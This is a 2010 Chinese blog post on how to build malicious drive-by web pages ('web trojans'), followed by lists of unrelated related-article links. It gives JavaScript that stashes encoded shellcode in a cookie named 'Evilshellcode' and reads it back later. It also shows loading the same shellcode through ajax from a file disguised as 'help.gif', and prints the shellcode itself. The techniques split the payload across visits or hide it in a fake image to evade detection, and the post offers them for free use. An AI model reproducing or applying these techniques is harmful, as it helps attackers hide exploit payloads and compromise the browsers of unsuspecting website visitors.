一个网马的tips实现分析


Posted in Javascript onNovember 28, 2010

cookie示例代码:

//存放 
function setCookie(sVar, sVal){ 
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC'; 
document.cookie = theCookie;} 
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......" 
setCookie('Evilshellcode', shellcode); 
//取出 
function getCookie(sVar){ 
cookies = document.cookie.split('; '); 
for(var i = 1; i <= cookies.length; i++){ 
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}} 
return ''; 
} 
a=unescape(getCookie('Evilshellcode'))

cookie存放的话,可以挂两次,第一次挂cookie写入代码无害,第二次再取出来结合新挂的代码来运行。怎么用随你了。

ajax来调用

<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script> 
var shellcode = $.ajax({ 
url: "help.gif", 
async: false 
}).responseText

help.gif内容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

Javascript 相关文章推荐
xml转json的js代码
Aug 28 Javascript
jQuery中RadioButtonList的功能及用法实例介绍
Aug 23 Javascript
jquery访问ashx文件示例代码
Aug 11 Javascript
node.js中的fs.fsyncSync方法使用说明
Dec 15 Javascript
基于JavaScript实现屏幕滚动效果
Jan 18 Javascript
微信小程序如何获知用户运行小程序的场景教程
May 17 Javascript
JavaScript实现短信倒计时60s
Oct 09 Javascript
前端MVVM框架解析之双向绑定
Jan 24 Javascript
Vue通过ref父子组件拿值方法
Sep 12 Javascript
webpack4.0 入门实践教程
Oct 08 Javascript
微信小程序webview与h5通过postMessage实现实时通讯的实现
Aug 20 Javascript
Ant-design-vue Table组件customRow属性的使用说明
Oct 28 Javascript
JQUBAR1.1 jQuery 柱状图插件发布
Nov 28 #Javascript
为jQuery增加join方法的实现代码
Nov 28 #Javascript
Jquery拖拽并简单保存的实现代码
Nov 28 #Javascript
jquery下将选择的checkbox的id组成字符串的方法
Nov 28 #Javascript
用jquery设置按钮的disabled属性的实现代码
Nov 28 #Javascript
IE6弹出“已终止操作”的解决办法
Nov 27 #Javascript
javascript 获取所有id中包含某关键字的控件的实现代码
Nov 25 #Javascript
You might like
php导出csv数据在浏览器中输出提供下载或保存到文件的示例
2014/04/24 PHP
php文件读取方法实例分析
2015/06/20 PHP
PHP中trait使用方法详细介绍
2017/05/21 PHP
javascript编程起步(第七课)
2007/01/10 Javascript
Javascript 读后台cookie代码
2008/09/15 Javascript
JQuery获取浏览器窗口内容部分高度的代码
2012/02/24 Javascript
JQuery为textarea添加maxlength属性并且兼容IE
2013/04/25 Javascript
jQuery获取和设置表单元素的方法
2014/02/14 Javascript
JSON+HTML实现国家省市联动选择效果
2014/05/18 Javascript
javascript 中的 delete及delete运算符
2015/11/15 Javascript
EasyUi combotree 实现动态加载树节点
2016/04/01 Javascript
vue项目中做编辑功能传递数据时遇到问题的解决方法
2016/12/19 Javascript
Vue.js常用指令的使用小结
2017/06/23 Javascript
jQuery实现简单轮播图效果
2020/12/27 jQuery
Python中实现对Timestamp和Datetime及UTC时间之间的转换
2015/04/08 Python
讲解Python中if语句的嵌套用法
2015/05/14 Python
用python制作游戏外挂
2018/01/04 Python
Python实现在tkinter中使用matplotlib绘制图形的方法示例
2018/01/18 Python
Python使用functools实现注解同步方法
2018/02/06 Python
Linux下多个Python版本安装教程
2018/08/15 Python
python读写csv文件并增加行列的实例代码
2019/08/01 Python
CSS3只让背景图片旋转180度的实现示例
2021/03/09 HTML / CSS
Allsole美国/加拿大:英国一家专门出售品牌鞋子的网站
2018/10/21 全球购物
瑞士领先的网上超市:LeShop.ch
2018/11/14 全球购物
Vans(范斯)新西兰官方网站:美国原创极限运动品牌
2020/09/19 全球购物
物业管理公司实习生自我鉴定
2013/09/19 职场文书
大学生职业生涯规划书模板
2014/01/03 职场文书
2014自主招生自荐信策略
2014/01/27 职场文书
国旗下演讲稿
2014/05/08 职场文书
小学教师工作总结2015
2015/04/07 职场文书
2015大一新生军训感言
2015/08/01 职场文书
演讲稿之开卷有益
2019/08/07 职场文书
MySQL Router实现MySQL的读写分离的方法
2021/05/27 MySQL
浅谈Python数学建模之整数规划
2021/06/23 Python
一起来看看Vue的核心原理剖析
2022/03/24 Vue.js
GoFrame基于性能测试得知grpool使用场景
2022/06/21 Golang